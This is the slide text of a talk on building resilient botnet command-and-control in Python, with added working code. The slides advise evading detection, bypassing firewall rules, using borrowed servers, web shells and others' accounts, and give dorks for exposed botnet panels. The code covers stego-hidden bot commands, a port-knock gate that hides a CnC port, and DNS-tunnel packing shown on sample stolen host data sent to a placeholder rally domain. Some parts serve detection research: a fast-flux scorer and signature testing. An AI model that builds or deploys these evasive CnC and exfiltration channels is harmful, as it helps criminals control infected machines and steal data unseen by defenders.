whoami
Security researcher. Code monkey. Beer lover. Head of Red Team Ops. Primary security researcher.
Study botnets with a focus on alternative CnC schemes. Blog about stuff, sometimes.
https://the-it-ninja.blogspot.com/
https://www.linkedin.com/in/daniel-reilly-58b28171
What this talk is NOT about
Building bots (there is plenty on this)
Protocol details (there are a lot of them)
Every CnC architecture (Storm-style P2P over Overnet, for instance)
Exploiting anything (sorry!)
Designing a web interface
What this talk IS about
Designing resilient CnC architectures
Using Python to build cool stuff
Virtuous vs. malicious botnets
Trust anchors (public/private keys, passwords)
Thinking about different ways to pass information
Why R.Y.O.
Avoid Detection
Keep your CnCs off blacklists by customizing their fingerprint.
Customize Attacks
Design your control servers around the objectives for your bots.
Only use communication methods that make sense in your environment. Do not use IRC. Pretty much ever.
Bypass Firewall Rules
Most companies still rely on blacklisting or whitelisting services, and most ACLs are IP based. Hide your traffic among all the other 'good' traffic.
Widely available CnC dashboards are good targets for botnet takeovers (Aditya Sood, 2014).
Botnet Taxonomy
A botnet taxonomy model from Northwestern University's CS department:
Attacking behavior (info stealing)
Rally mechanisms (static or random)
Communication protocols (DNS, HTTPS, etc.)
Observable botnet activities (host, network and globally correlated monitoring)
Evasion techniques (fast flux)
Multiple domains for DNS rally points
Fast flux the DNS server IPs across as many DNS servers as you can manage to harvest
Private GitHub accounts, SIP servers, etc.
Test your server UI for command and SQL injection
Private-key signed commands and encrypted responses
Station-to-station encryption
Avoid detection
Use common communication protocols
Encrypt traffic against MITM snoops
Hide ports / pages from scanners (port knock & .htaccess knock)
Reasonably fast command propagation
~1 ms – 10 min (or twice the max sleep time for a bot)
Avoids inbound connection attempts in IDS logs
Avoids a lot of heartbeat beacons on the network
Layered/Distributed Architecture
Two examples of distributed architecture. Web servers are API points which talk to the underlying DNS rally points.
1. Diagram 1 shows a bot master connecting via Tor to the CnC web layer, which manages 4 rally points.
2. Diagram 2 shows a recursive or “me-centralized” network where the primary CnC distributes commands to all other API points, which repeat this until an API point with no rally points is reached.
Communication Channels
HTTPS (HTTPLib)
Hides well in normal traffic
Encrypted == Trusted (DPI mostly ignores it; see note below*)
GitHub, Slack, Twitter, custom site, etc.
Stego to obscure data transfers
*As of IDP Release 5.0r2, Juniper IDP devices support inspecting HTTPS traffic without the server's private key
SSH (Paramiko, SSHCommander)
No client-side piece (just an RSA key)
https://github.com/dreilly369/SSHCommander
Combine with onion routing for pseudo-anonymity
VoIP
Asterisk & Pycall
Twilio (network API, resilience built in, scriptable interface)
Skype (network API, resilience built in, trusted by most firewalls)
DNS
Fast-flux (Storm Worm, 2007) style resilience
Good for bypassing IP-based ACLs
Rally point layer and command layer in one
Where to put CnC Servers
“Borrowed” servers (outside the scope of this talk)
Web shells
Web app exploits & service exploits
GitHub & other source code repos
Almost no company blocks these sites
Private accounts offer security
Public accounts offer anonymity
Image/Video/File hosting sites
S3 buckets, Dropboxes, email hosts, anywhere you can store information can become part of your CnC architecture
As mentioned, videos are great storage containers acceptable on most networks
You can even use other people's accounts with Outjection (injection on POST data)
Slack Accounts
Built FOR bots. The new era for IRC-style centralized CnC
GitHub as a CnC platform
Generally trusted. Great for virtuous botnets, okay for malicious bots too.
A good start on this was done by Justin Seitz in “Black Hat Python”.
To use the Python library github3.py you need to include it or wrap it in with your bot.
Discovery exposes all bots associated with that GitHub branch.
Activity can be monitored by anyone with bot credentials, even if they can't decipher contents.
Who knows who this is? What if 11B-X-1371 is a new method of CnC?
Around 3000 still images compose the 2:00 video. The audio track can also hide data (not just the spectrographic images either).
YouTube, Vimeo, etc., all have posting APIs that make them great locations to communicate with bots.
Traffic to these sites is high on a lot of networks. APT29 delivers HAMMERTOSS using steganography already!
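The stego the slides keep returning to (still frames, Stepic later in the deck) is least-significant-bit embedding. The following is an added example, not code from the talk or from Stepic: it performs LSB embedding and extraction over a raw RGB sample buffer so it runs without an image library. The cover is a constructed gradient; the remark about handing in `bytearray(img.tobytes())` from Pillow is an assumption about how you would wire it to real frames. The 4-byte length header is this example's own framing.

```python
"""LSB steganography over a raw RGB sample buffer.

Added example, not code from the talk or from Stepic: it shows the
least-significant-bit embedding that image stego tools such as Stepic rely
on, without needing an image library. The cover is a constructed gradient;
with Pillow you would hand in bytearray(img.tobytes()) and rebuild with
Image.frombytes (assumed wiring, not shown). The payload is framed with a
4-byte big-endian length so the extractor knows where the message ends.
"""
import struct

HEADER_LEN = 4  # bytes of length prefix


def capacity(cover: bytes) -> int:
    """Payload bytes that fit at one bit per sample, excluding the header."""
    return len(cover) // 8 - HEADER_LEN


def embed(cover: bytes, payload: bytes) -> bytearray:
    """Write len(payload) + payload into the LSB of successive samples.

    Each sample changes by at most 1, invisible in an 8-bit channel.
    """
    if len(payload) > capacity(cover):
        raise ValueError(
            f"payload of {len(payload)} B exceeds capacity of {capacity(cover)} B")
    out = bytearray(cover)
    framed = struct.pack(">I", len(payload)) + payload
    for bit_index in range(len(framed) * 8):
        bit = (framed[bit_index >> 3] >> (7 - (bit_index & 7))) & 1
        out[bit_index] = (out[bit_index] & 0xFE) | bit
    return out


def _read_bytes(stego: bytes, n_bytes: int, first_sample: int) -> bytes:
    """Collect n_bytes from the LSBs starting at sample index first_sample."""
    acc = bytearray()
    for i in range(n_bytes):
        value = 0
        for k in range(8):
            value = (value << 1) | (stego[first_sample + i * 8 + k] & 1)
        acc.append(value)
    return bytes(acc)


def extract(stego: bytes) -> bytes:
    """Recover the payload; raises if the header is not plausible."""
    (length,) = struct.unpack(">I", _read_bytes(stego, HEADER_LEN, 0))
    if length > capacity(stego):
        raise ValueError("no valid payload header in this buffer")
    return _read_bytes(stego, length, HEADER_LEN * 8)


# Constructed 32x32 RGB cover: a smooth gradient, 3072 samples, so 380 B of room.
COVER = bytes((x * 7 + y * 3 + c * 11) % 256
              for y in range(32) for x in range(32) for c in range(3))

if __name__ == "__main__":
    msg = b"cmd:sleep=600;pull=modules/exfil.py"
    stego = embed(COVER, msg)
    assert extract(stego) == msg
    print(f"{len(msg)} B hidden in {len(COVER)} samples, max per-sample delta "
          f"{max(abs(a - b) for a, b in zip(COVER, stego))}")
```

Two practical points follow from the code. Capacity is one bit per sample, so a 1080p frame carries about 770 KB and a 3000-frame video a couple of gigabytes, which is why the deck treats video as a storage container. Sequential embedding from sample zero is also the weakness: in flat or gradient regions the LSB plane of a natural image is not uniformly random, and a stego detector comparing LSB statistics at the start of the buffer against the rest will notice the transition. Stepic has the same property; scatter the bits with a keyed permutation if that matters.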
Demo LOSTDOG
DNS Fast Flux (boto.route53)
Single flux rapidly updates the “A” records (the list of IPs associated with a domain).
Used to rapidly change the list of known servers available to bots. Can be other bots or CnC points.
Bypasses IP blocking. Looks like a load balancer unless you map it over time.
Double flux also updates the “NS” records. Use this to change a bot's DNS rally points. Double flux is harder to detect and block because both the address layer and the name-server layer churn.
All the “cool kids” are doing it. OpenDNS has a great talk on detecting DNS fast flux:
https://www.youtube.com/watch?v=UG4ZUaWDXSs
https://en.wikipedia.org/wiki/Fast_flux
Robtex analysis of a fast-flux domain
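"Looks like a load balancer unless you map it over time" is the whole detection problem, so here is the mapping step as an added example (not code from the talk, OpenDNS or YAPDNS). It runs over constructed observations of the form (timestamp, rrtype, value, ttl), as a passive-DNS sensor or a periodic poll of the domain and its delegation would record them, and separates a load balancer from single and double flux by three signals the slides imply: low TTL, a pool that keeps growing instead of cycling, and addresses spread across many networks, plus NS churn for double flux. The thresholds and IPs are illustrative, not from any published detector.

```python
"""Map DNS answers for one domain over time and score them for fast flux.

Added example, not code from the talk. Observations are constructed
(timestamp, rrtype, value, ttl) tuples; no live DNS is queried and the
thresholds are illustrative.
"""
from collections import defaultdict
from ipaddress import ip_network


def flux_indicators(observations):
    """Summarise A and NS churn. observations: iterable of (ts, rrtype, value, ttl)."""
    a_ttls = []
    a_by_poll = defaultdict(set)    # ts -> set of A values answered at that poll
    ns_by_poll = defaultdict(set)   # ts -> set of NS names seen at that poll
    for ts, rrtype, value, ttl in observations:
        if rrtype == "A":
            a_ttls.append(ttl)
            a_by_poll[ts].add(value)
        elif rrtype == "NS":
            ns_by_poll[ts].add(value.lower().rstrip("."))
    # A load balancer cycles a fixed pool; a flux network keeps introducing
    # hosts it has never answered with before.
    seen, polls_with_new_ip = set(), 0
    for ts in sorted(a_by_poll):
        if a_by_poll[ts] - seen:
            polls_with_new_ip += 1
        seen |= a_by_poll[ts]
    # Distinct /16s approximate "how many networks": flux agents are compromised
    # hosts scattered across ISPs, a CDN or LB pool sits in a few provider ranges.
    prefixes = {ip_network(f"{ip}/16", strict=False) for ip in seen}
    # Double flux: the delegation itself changes between polls.
    prev, ns_changes = None, 0
    for ts in sorted(ns_by_poll):
        cur = frozenset(ns_by_poll[ts])
        if prev is not None and cur != prev:
            ns_changes += 1
        prev = cur
    return {
        "distinct_ips": len(seen),
        "distinct_prefixes": len(prefixes),
        "min_ttl": min(a_ttls) if a_ttls else None,
        "polls_with_new_ip": polls_with_new_ip,
        "total_polls": len(a_by_poll),
        "ns_changes": ns_changes,
    }


def score(observations, ttl_threshold=300):
    """Return (verdict, indicators); verdict is 'stable', 'single-flux' or 'double-flux'."""
    ind = flux_indicators(observations)
    low_ttl = ind["min_ttl"] is not None and ind["min_ttl"] <= ttl_threshold
    churn = ind["total_polls"] > 0 and ind["polls_with_new_ip"] / ind["total_polls"] > 0.5
    spread = ind["distinct_prefixes"] >= 3
    if low_ttl and churn and spread:
        return ("double-flux" if ind["ns_changes"] >= 2 else "single-flux"), ind
    return "stable", ind


# Constructed samples: six polls, 100 s apart.
POLLS = range(0, 600, 100)

# Load balancer: three addresses in two provider ranges, same answer every time.
LOAD_BALANCER = [(t, "A", ip, 60) for t in POLLS
                 for ip in ("203.0.113.10", "203.0.113.11", "198.51.100.7")]
LOAD_BALANCER += [(t, "NS", "ns1.example.net.", 86400) for t in POLLS]

# Single flux: two fresh hosts per poll, spread over many networks.
FLUX_HOSTS = ["45.33.12.9", "91.200.14.22", "185.10.58.3", "103.24.77.190",
              "177.54.8.33", "62.141.40.5", "5.188.9.14", "200.98.3.77",
              "41.77.129.6", "139.59.200.8", "77.83.12.12", "212.47.9.4"]
SINGLE_FLUX = [(t, "A", FLUX_HOSTS[2 * i + k], 60)
               for i, t in enumerate(POLLS) for k in (0, 1)]
SINGLE_FLUX += [(t, "NS", "ns1.example.net.", 86400) for t in POLLS]

# Double flux: the same A churn, plus a different name server at every poll.
DOUBLE_FLUX = [o for o in SINGLE_FLUX if o[1] == "A"]
DOUBLE_FLUX += [(t, "NS", f"ns{i}.rally.example.", 60) for i, t in enumerate(POLLS)]

if __name__ == "__main__":
    for label, obs in (("load balancer", LOAD_BALANCER),
                       ("single flux", SINGLE_FLUX), ("double flux", DOUBLE_FLUX)):
        verdict, ind = score(obs)
        print(f"{label:13s} -> {verdict:11s} {ind}")
```

Note that the load-balancer sample also has a 60 s TTL; low TTL alone is normal for CDNs and ELBs, which is why the verdict needs the growth and spread signals too. From the defender's side this is the argument for retaining passive DNS rather than single lookups; from the CnC designer's side it says the flux pool has to be large and geographically scattered, since reusing the same dozen hosts collapses the "polls with new IP" signal back to load-balancer behaviour.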
How to build the CnC
Obfuscate communication channels: HTTPS encryption, steganography, onion routing, port knocking
Language: Python
Paramiko (SSH module)
github3.py
Stepic (stego module)
py2exe or PyInstaller to compile binaries
Tons of other goodness
Layered security
Port knocking protects the CnC HTTPS port from discovery by scanners
HTTPS with HSTS protects from basic MITM snooping
Station-to-station encryption protects CnC → CnC communications
Bots use rally point polling for command verification, anchored off the bot master's private key
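The port-knock layer above is simple to get subtly wrong, so here is its decision logic as an added example (not code from the talk; knockd does the same job from the firewall log). The gate tracks each source's progress through a sequence of SYNs to closed ports within a time window, and only then admits that source to the hidden service port. The sequence ports, window, and the HMAC-derived rotating sequence at the end are assumptions for illustration, not the talk's settings. The firewall change itself is left to the caller so the logic runs offline.

```python
"""Port-knock gate in front of a hidden CnC port.

Added example, not code from the talk. Knock ports, the window and the
HMAC-derived rotating sequence are this example's assumptions.
"""
import hashlib
import hmac
import struct


class KnockGate:
    """Track per-source progress through a knock sequence on closed ports."""

    def __init__(self, sequence, window=5.0, open_for=30.0):
        self.sequence = list(sequence)   # e.g. [9000, 7000, 8000]; not monotonic
        self.window = window             # seconds allowed for the whole sequence
        self.open_for = open_for         # seconds the service port stays reachable
        self._progress = {}              # src -> (next_index, first_knock_ts)
        self._open_until = {}            # src -> expiry timestamp

    def knock(self, src, port, ts):
        """Feed one SYN to a *closed* port from src at time ts.

        Returns 'open' when the sequence completes, 'reset' when the knock is
        wrong, out of order or too late, and None while the sequence is in
        progress. Feed every closed-port SYN, not only the sequence ports:
        that is what makes a linear scanner trip the reset.
        """
        idx, started = self._progress.get(src, (0, ts))
        if ts - started > self.window:           # too slow: start over
            idx, started = 0, ts
        if port != self.sequence[idx]:
            self._progress.pop(src, None)
            return "reset"
        idx += 1
        if idx == len(self.sequence):
            self._progress.pop(src, None)
            self._open_until[src] = ts + self.open_for
            return "open"
        self._progress[src] = (idx, started)
        return None

    def allowed(self, src, ts):
        """Should a connection to the hidden port from src be accepted at ts?"""
        expiry = self._open_until.get(src)
        if expiry is None:
            return False
        if ts > expiry:
            del self._open_until[src]
            return False
        return True


def rotating_sequence(secret: bytes, counter: int, n=3, lo=10000, hi=60000):
    """One-time knock sequence, HOTP-style, so a sniffed sequence cannot be replayed.

    Bot master and CnC share `secret` and a counter and derive the same ports
    for the next knock. (Assumed design, not from the talk.)
    """
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha256).digest()
    ports = []
    for i in range(0, len(mac) - 1, 2):
        port = lo + int.from_bytes(mac[i:i + 2], "big") % (hi - lo)
        if port not in ports:            # repeated ports would be ambiguous
            ports.append(port)
        if len(ports) == n:
            break
    return ports


if __name__ == "__main__":
    gate = KnockGate([9000, 7000, 8000])
    for port, ts in ((9000, 100.0), (7000, 101.0), (8000, 102.0)):
        print(port, gate.knock("10.0.0.5", port, ts))
    print("allowed at t=110:", gate.allowed("10.0.0.5", 110.0))
    # A sequential scan touches 9000 then 9001, which resets the attempt.
    scanner = KnockGate([9000, 7000, 8000])
    hits = {scanner.knock("198.51.100.9", p, 200.0) for p in range(6999, 9002)}
    print("scanner ever opened the port:", "open" in hits)
    print("next one-time sequence:", rotating_sequence(b"shared-secret", 42))
```

Two caveats the slide does not spell out. A monotonic sequence such as 7000, 8000, 9000 is opened by any ascending port scan if the daemon only watches the sequence ports; resetting on every other closed-port SYN, as above, fixes that regardless of ordering. And a static sequence is a password sent in cleartext: anyone who can sniff the path replays it, which is what the rotating variant addresses. Port knocking hides the HTTPS port from scanners; it is not the trust anchor, the signed commands are.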
DNS For Comm (tunneling)
E.g. FeederBot, Morto (~2010)
Use valid DNS TXT record requests
Inject shellcode directly into memory
Hard to block. Combining fast flux with DNS tunneling creates a resilient rally point layer.
All record types (MX, NS, A, TXT, C, etc.) can be used, so blocking TXT is not an effective prevention mechanism.
Drawbacks
Queries to DNS servers other than the ones configured for the network can be alerted on
Slow by comparison to other protocols for data exfiltration
Demo DNSResponder
Python DNS Tunnel
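The part of a Python DNS tunnel that is not sockets is packing: bytes have to fit the 63-octet label and 253-octet name limits on the way up, and the 255-byte TXT character-strings on the way down, and the server has to reassemble chunks that UDP retries duplicated and reordered. The following is an added example, not the talk's DNSResponder or LOSTDOG code; it stops short of the wire, leaving the actual DNS packets to a library such as dnslib (assumed, not shown). The rally domain "rally.example" and the 12-hex-digit chunk header (session, seq, total) are this example's own conventions.

```python
"""Packing a DNS tunnel: bytes into query names (bot -> CnC) and into TXT
strings (CnC -> bot), plus reassembly that survives UDP reordering/retries.

Added example, not the talk's DNSResponder/LOSTDOG code. Wire encoding is
assumed to be done elsewhere (e.g. with dnslib). "rally.example" and the
chunk header layout are this example's conventions.
"""
import base64

MAX_LABEL = 63        # RFC 1035: one label is at most 63 octets
MAX_NAME = 253        # a name in presentation form, no trailing dot
MAX_TXT_STRING = 255  # one <character-string> inside TXT RDATA
HEADER_LEN = 12       # hex digits: 4 session + 4 seq + 4 total


def _b32(data: bytes) -> str:
    # Base32 survives resolvers that fold case; padding is dropped here and
    # restored on decode to save label space.
    return base64.b32encode(data).decode().rstrip("=").lower()


def _unb32(text: str) -> bytes:
    text = text.upper()
    return base64.b32decode(text + "=" * (-len(text) % 8))


def encode_upstream(session: int, data: bytes, domain: str) -> list:
    """Split data into query names <hdr>.<label>...<label>.<domain>, each within
    the label and name limits a recursive resolver enforces."""
    domain = domain.strip(".").lower()
    room = MAX_NAME - len(domain) - 1 - HEADER_LEN - 1   # chars left for payload labels
    n_labels = (room + 1) // (MAX_LABEL + 1)             # each label also costs a dot
    chunk_bytes = (n_labels * MAX_LABEL) * 5 // 8        # base32: 5 bits per char
    chunks = [data[i:i + chunk_bytes] for i in range(0, len(data), chunk_bytes)]
    names = []
    for seq, chunk in enumerate(chunks):
        enc = _b32(chunk)
        labels = [enc[i:i + MAX_LABEL] for i in range(0, len(enc), MAX_LABEL)]
        name = ".".join([f"{session:04x}{seq:04x}{len(chunks):04x}", *labels, domain])
        assert len(name) <= MAX_NAME
        names.append(name)
    return names


def reassemble(names, domain: str) -> dict:
    """Return {session: data} for every session whose chunks have all arrived.
    Duplicates (resolver retries) overwrite with identical bytes and order is
    restored from the seq field, so reordering and retries are harmless."""
    suffix = "." + domain.strip(".").lower()
    sessions = {}
    for name in names:
        name = name.lower()                       # resolvers may randomise case
        if not name.endswith(suffix):
            continue
        hdr, *labels = name[:-len(suffix)].split(".")
        if len(hdr) != HEADER_LEN:
            continue
        try:
            session, seq, total = (int(hdr[i:i + 4], 16) for i in (0, 4, 8))
            chunk = _unb32("".join(labels))
        except ValueError:
            continue                              # not ours, or damaged in transit
        s = sessions.setdefault(session, {"total": total, "parts": {}})
        s["parts"][seq] = chunk
    return {sid: b"".join(s["parts"][i] for i in range(s["total"]))
            for sid, s in sessions.items()
            if all(i in s["parts"] for i in range(s["total"]))}


def encode_txt(data: bytes) -> list:
    """Split a response into <=255-byte TXT character-strings; one TXT RR can
    carry several and the bot concatenates them before decoding."""
    enc = base64.b64encode(data)
    return [enc[i:i + MAX_TXT_STRING] for i in range(0, len(enc), MAX_TXT_STRING)]


def decode_txt(strings) -> bytes:
    return base64.b64decode(b"".join(strings))


RALLY_DOMAIN = "rally.example"                                 # placeholder
SAMPLE_EXFIL = b"host=ws17;user=j.doe;" + bytes(range(256))    # constructed, binary

if __name__ == "__main__":
    import random
    names = encode_upstream(0xBEEF, SAMPLE_EXFIL, RALLY_DOMAIN)
    print(f"{len(SAMPLE_EXFIL)} B -> {len(names)} queries, longest {max(map(len, names))} chars")
    delivered = names + names[:1]        # one retry duplicate
    random.shuffle(delivered)            # and arbitrary arrival order
    assert reassemble(delivered, RALLY_DOMAIN) == {0xBEEF: SAMPLE_EXFIL}
    reply = encode_txt(b"cmd:sleep 600")
    assert decode_txt(reply) == b"cmd:sleep 600"
    print(f"{len(reply)} TXT string(s): {reply[0]!r}")
```

The numbers explain the "slow by comparison" drawback: with a 13-character rally domain each query carries 118 bytes, so exfiltrating a megabyte is roughly 9,000 queries, each a separate round trip through the victim's resolver. They also show the detection surface the slide gestures at: long, high-entropy, single-use subdomains under one zone, which is exactly what the DNS-tunnel heuristics in an IDS or a resolver log pipeline key on, independent of record type.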
HTTPS For Comm
HTTPS is used to communicate larger amounts of data. Multiple parts of the CnC architecture rely on this:
Bot → Website data dumps
Master → CnC command propagation
CnC → Website data retrievals
Larger bot commands: the bot pulls new Python modules from a GitHub repo, which allows for nearly limitless configurations of the CnC architecture.
Drawbacks
HTTPS by itself is only protection from casual observers
HSTS can also be partially bypassed since SSLStrip+ (BH Asia 2014)
How NOT to Build the CnC
RA1NX: unauthenticated “pubcall” method; PHP/IRC portals in general
Torpig: researchers reverse engineered the domain flux algorithm in the bot and hijacked the botnet, because the bots trusted whoever answered at the predicted domain
Zemra bot: intentionally backdoored
ICE IX, Citadel, or Zeus: exposed through Google dorks
inurl:\cp.php?m=login
inurl:\adm/index.php?m=login
Push Instead of Pull
Good
Bots passively listen for commands on an SSH port
Discovering a bot does not expose botnet size
No knowledge of the bot master to leak
Good for CnC layer updating
Talk given on doing this in JavaScript by Diogo Mónica and Carlos Ribeiro: https://www.youtube.com/watch?v=6iM2jbheJ-0
Bad
Relatively easy to block: most networks block inbound connections or whitelist services
Not particularly fast
Mass scanning brings A LOT of attention to your project. See the talk given by Vissago at https://www.youtube.com/watch?v=UOWexFaRylM
Detecting private CnC Servers
HoneyNet YAPDNS for fast flux detection: https://github.com/honeynet/yapdns
Custom ClamAV/YARA signatures, e.g. DetectPyDNSResponder:0:646e736c6962*444e5352 (a ClamAV ndb hex body signature: the hex decodes to the ASCII strings "dnslib" and "DNSR", with * matching any bytes between them)
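To see what that ClamAV signature actually matches, here is an added example (not the talk's code) that parses ndb-format lines and runs the ordered, wildcard-separated byte search against a file image. The signature as printed in the slide lacks the ndb offset field, so `*` (any offset) is assumed where it is missing; only the `*` wildcard is implemented, ClamAV also supports `??`, `{n-m}` and more, and target type 0 means any file. The scanned blobs are constructed stand-ins for what a py2exe/PyInstaller bundle leaves in the image, not real samples, and the tightened signature is this example's own.

```python
"""Match a ClamAV ndb-style hex body signature against a file image.

Added example, not the talk's code. ndb format is
Name:TargetType:Offset:HexSignature with `*` meaning "any bytes"; a missing
offset field is treated as `*`. Blobs below are constructed, not real binaries.
"""


def parse_ndb(line: str):
    """Return (name, target_type, offset, [segment bytes, ...])."""
    name, target, *rest = line.strip().split(":")
    if len(rest) == 1:                 # offset field missing: assume any offset
        offset, hexsig = "*", rest[0]
    else:
        offset, hexsig = rest[0], rest[1]
    segments = [bytes.fromhex(seg) for seg in hexsig.split("*") if seg]
    return name, int(target), offset, segments


def matches(data: bytes, segments, offset="*") -> bool:
    """True if every segment appears, in order, each after the previous one.
    A numeric offset pins the first segment to that position."""
    pos = 0
    for i, seg in enumerate(segments):
        if i == 0 and offset != "*":
            start = int(offset)
            if data[start:start + len(seg)] != seg:
                return False
            pos = start + len(seg)
            continue
        idx = data.find(seg, pos)
        if idx < 0:
            return False
        pos = idx + len(seg)
    return True


def scan(data: bytes, ndb_lines) -> list:
    """Names of all signatures in ndb_lines that match data."""
    hits = []
    for line in ndb_lines:
        name, _target, offset, segments = parse_ndb(line)
        if matches(data, segments, offset):
            hits.append(name)
    return hits


TALK_SIG = "DetectPyDNSResponder:0:646e736c6962*444e5352"    # "dnslib" ... "DNSR"
# dnslib's own API class is DNSRecord, which also starts with "DNSR", so the
# talk's signature fires on any bundled dnslib program. A tighter second
# segment spells out the responder class name ("DNSResponder") instead.
TIGHT_SIG = "DetectPyDNSResponderTight:0:*:646e736c6962*444e53526573706f6e646572"

# Constructed blobs: the kind of strings a bundler leaves readable in the image.
RESPONDER = (b"\x7fELF" + b"\0" * 64 + b"import dnslib" + b"\0" * 128
             + b"class DNSResponder:" + b"\0" * 16)
OTHER_DNSLIB_USER = (b"\x7fELF" + b"\0" * 64
                     + b"import dnslib\nq = dnslib.DNSRecord.question('example.com')")
NO_DNSLIB = b"\x7fELF" + b"\0" * 64 + b"import dns.resolver\nclass DNSResolver: pass"

if __name__ == "__main__":
    for label, blob in (("responder", RESPONDER),
                        ("other dnslib user", OTHER_DNSLIB_USER),
                        ("no dnslib", NO_DNSLIB)):
        print(f"{label:18s} talk sig: {scan(blob, [TALK_SIG])!s:26s} "
              f"tight sig: {scan(blob, [TIGHT_SIG])}")
```

The second blob is the point: because dnslib's public API is `dnslib.DNSRecord`, the two-segment signature from the slide matches essentially every program that bundles dnslib, not just the responder. Before shipping a custom ndb or YARA rule, run it against a corpus of benign binaries built with the same toolchain; a responder-specific string (the class name, a fixed rally-domain fragment, an unusual record-building sequence) is what makes the rule useful rather than a dnslib detector.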